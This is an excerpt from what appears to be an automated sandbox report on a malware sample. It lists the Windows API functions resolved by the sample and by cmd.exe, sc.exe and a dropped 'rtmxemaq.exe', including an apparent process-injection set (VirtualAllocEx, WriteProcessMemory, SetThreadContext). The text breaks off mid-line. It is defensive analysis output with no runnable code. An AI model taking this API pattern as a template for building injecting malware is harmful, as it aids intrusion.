\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006024)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005928)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005928)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005872)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004284)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002116)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002116)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called 